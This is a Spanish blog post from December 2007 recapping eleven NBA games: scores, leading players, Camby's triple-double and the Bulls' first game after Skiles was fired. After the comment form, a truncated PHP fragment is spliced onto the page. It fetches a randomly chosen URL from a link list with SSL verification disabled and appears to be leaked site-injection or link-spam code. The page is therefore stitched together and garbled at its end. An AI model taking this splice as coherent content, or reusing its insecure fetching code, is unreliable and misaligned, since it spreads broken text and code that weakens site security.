La crónica (26/12/07)

27 de December de 2007 por telekoman

Anoche se disputó una jornada con 11 partidos que confirmó que Boston, Detroit y San Antonio son los más fuertes de la NBA en la actualidad y sus 20 o más victorias así lo confirman. También se confirmó que Minnesota, Miami, New York y Memphis son los más débiles y lucharán por la mejor posición en el draft. La jornada nos dejó el primer partido de Chicago sin Skiles, saldado con derrota, el tercer triple doble de la carrera de Marcus Camby, la racha de 5 partidos ganados de Atlanta, la recuperación de Washington tras unas semanas lamentables y la derrota de los Mavericks a manos de Boozer y sus Jazz

 



Heat 85 – 96 Sixers

Andan los Heat buscando un base y ayer se enfrentaron a uno que suena como futurible: Andre Miller. Miller salió muy enchufado y jugó un gran primer cuarto anotando los 12 puntos que conseguiría en el partido. A partir de ahí se dedicó a dirigir y sumar asistencias, hasta 12 con 8 rebotes, y a controlar la ventaja adquirida. Porque en la primera parte de la mano de los Andres (Miller e Iguodala) los Sixers pasaron por encima de Miami.

En la segunda parte los Heat reaccionaron de la mano, como no, de Wade que anotó 20 de 27 puntos en este segundo tiempo. No fue suficiente. Wade se vio muy solo en el intento de reacción ya que únicamente Davis jugó un buen partido. Sin bases por las lesiones de Quinn y Jason Williams, Wade jugó de 1 durante casi todo el partido, algo que no favorece a los Heat. Sigue la mala racha de los Heat que además no están teniendo suerte con las lesiones.

Wizards 108 – 104 Bobcats

La vuelta de Butler, buenos partidos de Haywood y Jamison y, sobre todo, el gran comienzo de un inesperado Mason le dieron la victoria a los WIzards. Estos 4 jugadores pasaron de 20 puntos por los de Washington y anotaron 95 de los 108 puntos del equipo. Especialmente inspirado empezó Roger Mason, un trotamundos del baloncesto, que anotó sus 6 primeros tiros, 4 de ellos de 3 puntos, dando así una ventaja a los Wizards en el primer cuarto que a la postre fue definitiva.

Por parte de los Bobcats buenos partidos de Richardson y Wallace pero mas problemas en el juego interior. Okafor cogió su primer rebote al falta de 2:47 para acabar el segundo cuarto y Mohammed, como viene siendo habitual, se cargó de faltas.

Pacers 95 – 107 Hawks

Quinta victoria consecutiva para Atlanta que le sitúa en un balance de 15-12 por encima del 50% y en puestos de Play Offs por primera vez a estas alturas desde la temporada 98-99. La victoria se basó en un gran Joe Johnson con 26 puntos y 11 asistencias que estuvo muy bien secundado por muchos jugadores. Todos los titulares, además de Childress y Shelden Williams desde el banco, jugaron a buen nivel.

Por parte de los Pacers el mejor fue Murphy, pero la mejor noticia es que Tinsley sigue a buen nivel y que Jermaine volvió a hacer un buen partido. Siguen con balance positivo y en puestos de Playoffs así que no deben inquietarse por una derrota en el campo de uno de los equipos mas fuertes en su casa de la conferencia Este.

Knicks 96 – 110 Magic

Durante 3 cuartos estuvieron los Knicks en el partido pero al final no pudieron ganar a los Magic. Isiah Thomas salió con diversos cambios en busca de la reacción de los Knicks pero al final no dieron resultado. Lee jugó titular y acabó con 11 puntos y 14 rebotes. Randolph salió desde el banco pero al final jugó 33 minutos y anotó 22 puntos con 9 rebotes. Curry también fue titular pero jugó poco mas de 4 minutos, 2 al inicio y 2 y medio al inicio del último cuarto. Los Knicks parece que siguen sin norte, sin defender y sin encontrar en ataque la solución a sus problemas. Anoche sólo Crawford, Randolph y Robinson estuvieron acertados.

Los Magic hicieron un partido de menos a más. Lewis les mantuvo en el partido durante la primera parte y Turkoglu salió inspirado al inicio del último cuarto para, con un parcial de 20-6, llevarse el partido. Ambos fueron los mejores de Orlando que ni siquiera necesitaron a un Howard dominador de la zona como otras noches.

Pistons 101 – 83 Nets

Con un 78% de acierto en tiros y un parcial de 31-18 en el tercer cuarto, los Pistons dejaron visto para sentencia el partido en la que es sus sexta victoria consecutiva. Como casi siempre, Hamilton y Billups fueron los mejores de Detroit, bien acompañados por el juego interior, Sheed y McDyess.

Por los Nets los mejores fueron Carter con 21 puntos y Jefferson con 18. Kidd repartió 13 asistencias pero falló los 8 tiros que intentó. Además los Nets perdieron 17 balones, 7 de ellos Jefferson.

Hornets 116 – 98 Grizzlies

A Chris Paul le encanta jugar contra los Grizzlies. La falta de defensa del equipo de Memphis permite al gran base de los Hornets desplegar todo su juego ofensivo. Su mejor marca personal es de 43 puntos, conseguida el pasado 7 de Diciembre precisamente contra los Grizzlies y en esta ocasión les ha metido 40. Por su parte Gasol ha terminado con su racha de 81 partidos consiguiendo 10 o más puntos al anotar tan sólo 8 en su duelo particular con Tyson Chandler. El jugador español fue incluso pitado en alguna ocasión a lo largo del encuentro por su falta de agresividad de cara al aro. Por parte de los Hornets destacaron también David West, con 20 puntos y 9 rebotes, y Stojakovic con 21 puntos, mientras que por Memphis, Gay y Miller consiguieron 19 puntos.

Bull 79 – 94 Spurs

Primer partido de Chicago tras la destitución de Scott Skiles como entrenador y primera derrota. Al mando del equipo estaba Pete Myers, el segundo entrenador de Skiles y que actúa como interino. Pero los Spurs no son el mejor equipo al que te puedes enfrentar cuando tienes problemas internos y no tienes claro tu esquema de juego. Ni siquiera contando que los de San Antonio llegaban a Chicago sin Manu Ginobili y que Brent Barry se lesionó durante el primer cuarto.

Los Spurs, que con este partido alcanzan la cifra de 20 victorias y que llevan un balance en casa de 15 a 1, se apoyaron en otro de sus baluartes, Tony Parker. El base francés anotó 28 puntos y repartió 5 asistencias. En los Bulls, Joe Smith anotó 19 puntos y capturó 11 rebotes para ser el mejor jugador de su equipo, seguido de Ben Gordon que con una serie de 8 de 16 anotó 18 puntos. Los Bulls se quedan con un balance de 9 victorias y 17 derrotas.

Bucks 105 – 125 Nuggets

Si a cualquiera le preguntan que jugador de los Nuggets podría haber hecho un triple doble, absolutamente nadie habría dicho Marcus Camby. Pero así ha sido. El center de Denver ha anotado 10 puntos, capturado 11 rebotes y puesto la increíble cifra de 10 tapones. Al principio del último cuarto, Camby ya había conseguido 11 rebotes y 10 tapones, y llevaba 7 puntos, por lo que, entre bromas con sus compañeros, apostó que iba a conseguir el triple doble metiendo un triple. Efectivamente, el primer tiro de ese último cuarto fue un triple convertido por Camby. En ese momento el partido estaba más que roto y la diferencia era de 32 puntos. Junto a Camby, Melo consiguió 29 puntos y 10 rebotes, Iverson 24 puntos y 6 asistencias, y Nene regresó después de estar casi dos meses de baja. Por parte de los Bucks tan sólo Mo Williams con 28 puntos y 7 asistencias fue capaz de oponer algo de resistencia a unos Nuggets que cogen algo de aire en su lucha con Portland por el primer puesto de la División NorthWest.

Mavericks 90 – 99 Jazz

Pocas veces un equipo sale tan enchufado a la cancha como para lograr un 16-0 de parcial. Y menos si delante están los Dallas Mavericks. Pero Utah lo ha conseguido apoyándose en una fuerte defensa. el partido parecía que iba a ser fácil, pero evidentemente no ha sido así y Dallas ha conseguido remontar durante el segundo cuarto hasta llegar al descanso con sólo un punto de desventaja. Los Jazz han conseguido hacerse con el partido gracias a un gran final de Carlos Boozer, algo poco usual en él, que ha conseguido 6 de los últimos 7 puntos de su equipo para alcanzar los 21 y ser el máximo anotador. Junto a él Deron Williams con 17 puntos y 12 asistencias y Kirilenko con 17 puntos y 3 robos, los dos últimos en los compases finales del partido, han sido los mejores de los Jazz. Por parte de Dallas Nowitzki ha llegado a los 20 puntos pero se ha empeñado en el tiro de 3 con bastante mal resultado, 3 de 10, condenando el juego interior de su equipo.

Celtics 89 – 69 Kings

Debido a la gran cantidad de equipos, las conferencias y divisiones, el calendario de la NBA es bastante difícil de seguir para la gente. Los equipos no juegan la misma cantidad de veces con todos los equipos y eso puede llevar a engaño. Durante muchos años, la conferencia Este ha sido mucho más floja que la conferencia Oeste, y lo sigue siendo. Parte del secreto del éxito de esta temporada de los Boston Celtics radica en que en sus enfrentamientos fuera de casa, aún no se había enfrentado a ningún equipo del Oeste. Hasta hoy. Sacramento ha sido la primera visita de los Celtics a la Costa Oeste. No ha sido un gran partido en lo que a anotación se refiere, pero ha sido un gran espectáculo defensivo. Boston ha decidido hacer de la defensa su principal arma y sin duda está consiguiendo de ella grandes créditos. En el partido de hoy ha conseguido dejar a Sacramento en 13 puntos en el segundo y en el último cuarto, desquiciando a hombres como Artest que, con un 4 de 15 en tiro, no han tenido su noche.

Timberwolves 101 – 105 Warriors

El protagonista principal del partido ha sido Monta Ellis, que ha llevado su mejor marca temporal hasta los 35 puntos. Los Warriors han tenido el partido controlado durante los 3 primeros cuartos gracias a la dirección de un Baron Davis que a sus 27 puntos ha añadido 7 asistencias y 6 rebotes. En el último sin embargo han perdido su tempo y han permitido que los Timberwolves se acercaran en el marcador e inquietaran a los aficionados de Oakland. Una canasta de Gomes ha puesto el 98 a 96 a favor de los Warriors a falta de 1 minuto, pero a partir de ahí el base del equipo de la Bahía ha sido capaz de mantener la calma y llevar a su equipo a la victoria ayudado por Ellis. Por los Timberwolves el mejor ha sido de nuevo Al Jefferson con 20 puntos y 19 rebotes.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>